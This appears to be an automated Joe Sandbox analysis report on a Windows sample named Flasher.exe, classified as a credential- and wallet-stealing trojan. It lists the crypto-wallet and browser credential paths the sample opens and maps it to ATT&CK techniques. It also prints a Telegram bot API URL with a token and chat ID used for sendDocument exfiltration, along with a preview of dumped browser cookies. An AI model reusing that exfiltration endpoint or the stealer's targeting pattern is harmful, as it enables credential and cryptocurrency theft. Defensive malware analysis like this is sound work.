                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Flasher.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35D4818 bind,GetLastError,0_2_00007FF6D35D4818
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                Windows Management Instrumentation
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory31
                Security Software Discovery
                Remote Desktop Protocol3
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS31
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeylogging13
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Network Configuration Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem25
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Flasher.exe100%AviraHEUR/AGEN.1363266
                Flasher.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://cdn.ipwhois.io/flags/us.svg0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ipwho.is
                108.181.61.49
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                        high
                        https://duckduckgo.com/chrome_newtabFlasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                          high
                          https://duckduckgo.com/ac/?q=Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                            high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoFlasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                              high
                              https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML0Flasher.exefalse
                                high
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFlasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                                  high
                                  https://docs.rs/getrandom#nodejs-es-module-supportFlasher.exefalse
                                    high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                                      high
                                      https://api.telegram.org/bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-466Flasher.exe, 00000000.00000003.1760743375.000001EE77951000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1760408069.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTMLFlasher.exefalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                                            high
                                            https://www.ecosia.org/newtab/Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                                              high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drfalse
                                                high
                                                https://cdn.ipwhois.io/flags/us.svgFlasher.exe, 00000000.00000003.1760408069.000001EE77891000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000002.1761203830.000001EE77891000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                149.154.167.220
                                                api.telegram.orgUnited Kingdom
                                                62041TELEGRAMRUfalse
                                                108.181.61.49
                                                ipwho.isCanada
                                                852ASN852CAfalse
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1581484
                                                Start date and time:2024-12-27 21:47:10 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 16s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:3
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Flasher.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.winEXE@4/51@2/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 69%
                                                • Number of executed functions: 100
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated
                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 104.208.16.94
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Flasher.exe
                                                TimeTypeDescription
                                                15:48:04API Interceptor5x Sleep call for process: powershell.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                149.154.167.220i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                  INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                setup.exeGet hashmaliciousBabadedaBrowse
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    108.181.61.49888.exeGet hashmaliciousLuca StealerBrowse
                                                                    • /?output=json
                                                                    888.exeGet hashmaliciousLuca StealerBrowse
                                                                    • /?output=json
                                                                    Cracker.exeGet hashmaliciousLuca StealerBrowse
                                                                    • /?output=json
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    api.telegram.orgINQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 149.154.167.220
                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    tg.exeGet hashmaliciousBabadedaBrowse
                                                                    • 149.154.167.220
                                                                    tg.exeGet hashmaliciousBabadedaBrowse
                                                                    • 149.154.167.220
                                                                    setup.exeGet hashmaliciousBabadedaBrowse
                                                                    • 149.154.167.220
                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    • 149.154.167.220
                                                                    user.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                    • 149.154.167.220
                                                                    ipwho.ismsgde.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    wUSt04rfJ0.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                    • 108.181.61.49
                                                                    StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    kqeGVKtpy2.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    TELEGRAMRUJA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                    • 149.154.167.99
                                                                    aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    installer.batGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    skript.batGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    din.exeGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    yoda.exeGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    lem.exeGet hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                    • 149.154.167.99
                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                    • 149.154.167.220
                                                                    ASN852CAmsgde.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    telnet.sh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 75.155.196.115
                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                    • 205.250.152.203
                                                                    wUSt04rfJ0.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    armv7l.elfGet hashmaliciousUnknownBrowse
                                                                    • 75.155.145.0
                                                                    jklspc.elfGet hashmaliciousUnknownBrowse
                                                                    • 50.99.243.16
                                                                    splsh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 207.34.140.144
                                                                    splmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 142.241.147.185
                                                                    splx86.elfGet hashmaliciousUnknownBrowse
                                                                    • 199.126.48.47
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0e738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    TCKxnQ5CPn.exeGet hashmaliciousUnknownBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    skript.batGet hashmaliciousVidarBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    msgde.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                    • 108.181.61.49
                                                                    • 149.154.167.220
                                                                    No context
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1510207563435464
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:@...e................................................@..........
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:ASCII text, with very long lines (523)
                                                                    Category:dropped
                                                                    Size (bytes):3320
                                                                    Entropy (8bit):5.841496511363167
                                                                    Encrypted:false
                                                                    SSDEEP:96:PJfpoO2jFcRhFZyJKhZLzmv3u2FSEe135sSCwPB2cvsmC:RQmRtugaU0
                                                                    MD5:474F8569A0995EBC308E6F09274D4AE9
                                                                    SHA1:315FCF510C6E2DC6C1986605D4E87ABF7936623B
                                                                    SHA-256:9919AE4602285BB1FE77719ADAF98E7222EB53B927E367EC6E0C9C3F1DBA164C
                                                                    SHA-512:EF667DEDBBBBE118304A6FF3E3A4451B9B955A66BB96479C724602BE4CBC4B09915FE5C3F3FBB2560986EBDE0DEC2F03D5344A569C19092A7F461597B66E7193
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.google.com.false./.TRUE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.true./.TRUE.13340887435186329..AspNetCore.AuthProvider.True.support.microsoft.com.true./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.true./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.true./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.false./.TRUE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&H
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):913744
                                                                    Entropy (8bit):7.961431630931833
                                                                    Encrypted:false
                                                                    SSDEEP:12288:yohDfNc/PGaqTyzKX5o/i46oWb85BD4ojs4Wj9CJYT7RlXsVlf/RVF53NLMJkqS:yoJC/PRgyzi5oK85F4ojbWRSYT72d6TS
                                                                    MD5:002A0EAF9966C670C35396A48686B0BC
                                                                    SHA1:9E5A5FC409EFDC48703EE92F2ACC14EB4901C5EB
                                                                    SHA-256:62082605D85EB82F8FED3DA45E2B5CE478928100F896BD21D35CDE40680A5996
                                                                    SHA-512:2E1461B5D586069D9D7B55DFDE4C0B2C0C01114E0ABBC801AD91E317B3FF59E9DFE72E8D8CC06E0A5FF97B2CC11C0A9D881F2A1FFAFBC13B09DF97DF952B7A31
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.PNG........IHDR................C....IDATx...y.u}Z.....y..}...`.(T9..D....h......:}%.2......t.s]..D@...(...A..AD./p.j'. .(TQ.;<......{.....}...xW.{....~.5.~........x...@.Ce.XM|.^.....].1...e5...i~.F..l.z>.s.7.y......c.......N.lkz..]Js.E.k...5....k..80........9.4.~.S......[.X....c....4mH.Fy .....}.i..../..#.:p...m...:w.t8.....1.....)f_.>.#n..:.X....b.}^.S.;......M..|L...m.....n..aO....w.i...>......qh~:...w. .R....].6..o....M%..'........9.1..H....'}.+.Pc...*..*......Z-.;.Z.y..|.9.Gg.a^m.1J...a...)VR.../.c..I...._..._m..e...E.:.?.U... .y.fJ.hz..I.z....}.\.{.aW......W...5/.9;;...:..kWY..(.io..\.s.....Z.:.$ ..\...A..*.I.../.{5..y.\u..'......0m.Q?r.&..F.......qT....!.a...v...8...{{..]..<.q....[.=Y..e.>.....q.[..#N.*O..g.IYR..1..ue.9.^z).s@.}{.$..CY.:`h.g..e).3.F..o.\...}sV.x1....U.......,S.q0rhh...........W....Q.#w....e)...5..w..=zTy_|...c..c~.._>.P.....d.&{...:.... <v.....<b..6I\.[..#..~.......x.c.eP.~mS>...+...6En@.ri/%w0.).
                                                                    Process:C:\Users\user\Desktop\Flasher.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):20386
                                                                    Entropy (8bit):5.0102132434779785
                                                                    Encrypted:false
                                                                    SSDEEP:384:uOl9tybTPHTPYvZR1lDOl9tybTPHTPYvZR1lQC:ugtyCPgtyCMC
                                                                    MD5:767176BA0DB3433DBEF1E4E57512D010
                                                                    SHA1:21EB8C247D83B8EAE9EBAAC46D977822882FBFA8
                                                                    SHA-256:B5708ACA155E0B7504B33EFFF5B165129DA1A7B56E3D1B5C9A7856EF875A0504
                                                                    SHA-512:D344E3FC13628A0E23489AF8C93A21CE377EEC2497A9379ED2510E4266AEE0745D95A560BDCDAD39C1ABF50C050790FB487D6A899C0131D89F49D9891D23880C
                                                                    Malicious:false
                                                                    Reputation:low
